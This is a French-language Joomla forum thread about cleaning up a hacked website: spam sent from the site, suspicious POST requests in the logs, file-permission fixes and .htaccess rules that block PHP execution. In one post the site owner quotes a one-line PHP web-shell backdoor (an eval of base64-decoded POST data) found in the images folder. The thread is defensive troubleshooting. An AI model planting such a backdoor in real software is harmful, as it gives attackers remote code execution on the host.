Attaque spammeur

Réduire
Ce sujet est fermé.
X
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Attaque spammeur

    Bonjour,

    Je ne sais pas si je pose ma question sur le bon forum, désolé.

    Nous venons de changer d'hébergeur de Nerim nous sommes passé à OVH. Or depuis notre site a été victime d'attaque d'un spammeur. Après avoir joué au chat et la sourie durant quelques temps il semble que le problème soit résolu. J'ai fini par mettre tout les droits des dossiers et fichiers du site en, respectivement, 505 et 404, afin d'interdire l'accès en écriture. Plus aucun spam part du site.
    Toutefois il semble qu'il reste un problème. J'ai toujours des dizaines de requêtes "POST" sur ce fichier :
    "50.63.56.17 lpoaquitaine.org - [10/Aug/2014:23:47:53 +0200] "POST /plugins/phocadownload/formations/template.php HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)""
    Problème j'ai supprimé le fichier "template.php" depuis une quinzaine de jour. Bien sûr l'adresse IP change à chaque requête. Que puis-je faire svp?

    Je suis à votre disposition pour plus d'infos.

    Cordialement
    JM

  • #2
    Re : Attaque spammeur

    Bonjour,
    Récupérer l'ensemble des fichiers sur un ordinateur local, puis les scanner avec Eset online.
    Qu'est ce que ça donne?
    Accompagnateur de Projets WEB depuis 1995
    Joomla! 3x Certified Administrator

    Développeur Front-End à l'Observatoire Nice Côte d'Azur

    Commentaire


    • #3
      Re : Attaque spammeur

      Bonjour

      Envoyé par jmmd Voir le message
      J'ai toujours des dizaines de requêtes "POST" sur ce fichier :
      "50.63.56.17 lpoaquitaine.org - [10/Aug/2014:23:47:53 +0200] "POST /plugins/phocadownload/formations/template.php HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)""
      Problème j'ai supprimé le fichier "template.php" depuis une quinzaine de jour. Bien sûr l'adresse IP change à chaque requête.
      Je ne me préoccuperais pas trop à ta place du fait que quelqu'un lance une requête vers ton site dès lors que cette requête a un code 404 (ce qui est le cas ici). Il y a tant et tant de scripts qui lancent des requêtes à tout va sur internet pour exécuter des requêtes paramétrées vers telle ou telle page; donc, pas de soucis.

      Toutefois, le fait que tu dises que tu as supprimé le fichier il y a deux semaines indique ... que le fichier était présent. As-tu ouvert le fichier avec un éditeur pour voir ce qu'il contenait ? As-tu vérifié dans le plugin phocadownload d'origine pour voir s'il contient un dossier /formations (ce dont je doute fort). Donc : tu as supprimé un fichier qui n'aurait pas dû être présent ===> tu as très certainement été hacké puisque quelqu'un a pû ajouter ce fichier à ton site.

      Tu as supprimé *cette* menace-la, parfait reste que, peut-être, tu as d'autres scripts malveillants sur ton site. Peut-être...

      Je te suggère donc d'analyser ton site en détail pour voir s'il n'y a pas d'autres bestioles.

      Bonne journée.
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire


      • #4
        Re : Attaque spammeur

        Pour exemple, j'ai eu un cas similaire pour un client, avec des requêtes Post du même type.
        OVH bloquait régulièrement l’accès au site.

        Finalement Eset Online scanner a été super efficace en détectant 30 fichiers infestés par PHP/WebShell.NBV trojan.
        J'ai ensuite supprimé TOUS les fichiers du serveur OVH, et transféré les fichiers à partir de l'ordinateur local.
        Depuis, plus de Post de ce genre dans les logs Appache, et le site se porte bien (jusqu’à la prochaine).

        Bien sur chaque cas est différent, mais c'est la méthode que j'utiliserais en priorité si cela devait se reproduire.

        Après il y a l'analyse des fichiers douteux. Cela peut être fastidieux.
        Quand on connait bien la structure de Joomla!, on les repères plus facilement. On peut comparer également avec un site sain.

        Pense aussi à faire les mises à jour de toutes les extensions installées.
        Dernière édition par APWEB à 11/08/2014, 10h46
        Accompagnateur de Projets WEB depuis 1995
        Joomla! 3x Certified Administrator

        Développeur Front-End à l'Observatoire Nice Côte d'Azur

        Commentaire


        • #5
          Re : Attaque spammeur

          Bonjour,

          Déjà la première partie de ta réponse me rassure

          Pour le dossier /formation non il n'existe pas dans le plugin d'origine, c'est moi qui l'ai ajouté ainsi que d'autres afin de classer les fichiers.

          Existe t-il des outils pour analyser un site joomla 2.5 stp?

          Merci pour ta réponse, bonne journée.
          JM

          Commentaire


          • #6
            Re : Attaque spammeur

            Envoyé par APWEB Voir le message
            Finalement Eset Online scanner a été super efficace en détectant 30 fichiers infestés par PHP/WebShell.NBV trojan.
            J'ai ensuite supprimé TOUS les fichiers du serveur OVH, et transféré les fichiers à partir de l'ordinateur local.
            Depuis, plus de Post de ce genre dans les logs Appache, et le site se porte bien (jusqu’à la prochaine).

            Après il y a l'analyse des fichiers douteux. Cela peut être fastidieux.
            Quand on connait bien la structure de Joomla!, on les repères plus facilement. On peut comparer également avec un site sain.

            Pense aussi à faire les mises à jour de toutes les extensions installées.
            Bonjour,

            Le problème est que Eset Online scanner est pour Windows et je suis sous Ubuntu

            Commentaire


            • #7
              Re : Attaque spammeur

              Envoyé par jmmd Voir le message
              Existe t-il des outils pour analyser un site joomla 2.5 stp?
              J'ai regroupé un maximum de mes informations sur cette page : http://www.aesecure.com/fr/blog/site-hacke.html

              Note que je suis utilisateur de Windows et que je ne connais aucun outil précis pour ubuntu.

              Pour analyser les logfiles, j'utilise un outil perso.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #8
                Re : Attaque spammeur

                Envoyé par cavo789 Voir le message
                J'ai regroupé un maximum de mes informations sur cette page : http://www.aesecure.com/fr/blog/site-hacke.html

                Note que je suis utilisateur de Windows et que je ne connais aucun outil précis pour ubuntu.

                Pour analyser les logfiles, j'utilise un outil perso.
                J'ai commencé à faire des recherches et j'ai trouvé dans /images/contactmap un fichier du nom de search.php qui contient
                <?php eval(base64_decode($_POST['ne0080b']));?>
                Si j'en crois les infos sur ton lien je peux le supprimer?

                Commentaire


                • #9
                  Re : Attaque spammeur

                  Envoyé par jmmd Voir le message
                  Si j'en crois les infos sur ton lien je peux le supprimer?
                  Oh que OUI !!

                  C'est un code hyper malsain. Donc tu as bien été hacké et ton site en contient encore des traces.

                  Courage.
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire


                  • #10
                    Re : Attaque spammeur

                    Bon impossible de le supprimer J'ai pourtant remis les droit d'écriture

                    Commentaire


                    • #11
                      Re : Attaque spammeur

                      J'ai un autre fichier qui contient le même type de code "error.php", mais il m'est impossible de le supprimer

                      Commentaire


                      • #12
                        Re : Attaque spammeur

                        C'est bon les fichiers sont supprimer je m'était planté dans les droits

                        Commentaire


                        • #13
                          Re : Attaque spammeur

                          Bien alors j'ai trouvé ton scripte pour interdire l'exécution de scripte php et j'ai mis en place un fichier .htaccess dans /images et /media puis j'ai fait un test. Je suis tombé sur le message suivant "Forbidden You don't have permission to access /media/test.php on this server." Il semble que cela fonctionne
                          En revanche dans le dossier /tmp je n'ai pas trouvé de fichiers .htaccess est-ce normal svp?

                          Commentaire


                          • #14
                            Re : Attaque spammeur

                            Je viens de voir ton logiciel aeSecure, je peux l'installer malgré que des fichiers .htaccess soient déjà en place ou faut il que je les supprimes stp?

                            Commentaire


                            • #15
                              Re : Attaque spammeur

                              Continue à vérifier les logs Apache sur OVH, pendant quelques jours. Si ces fameuses lignes POST ont disparues c'est que c'est gagné! En principe, car il faut rester prudent et vigilant en ce domaine.
                              Dernière édition par APWEB à 11/08/2014, 16h45
                              Accompagnateur de Projets WEB depuis 1995
                              Joomla! 3x Certified Administrator

                              Développeur Front-End à l'Observatoire Nice Côte d'Azur

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X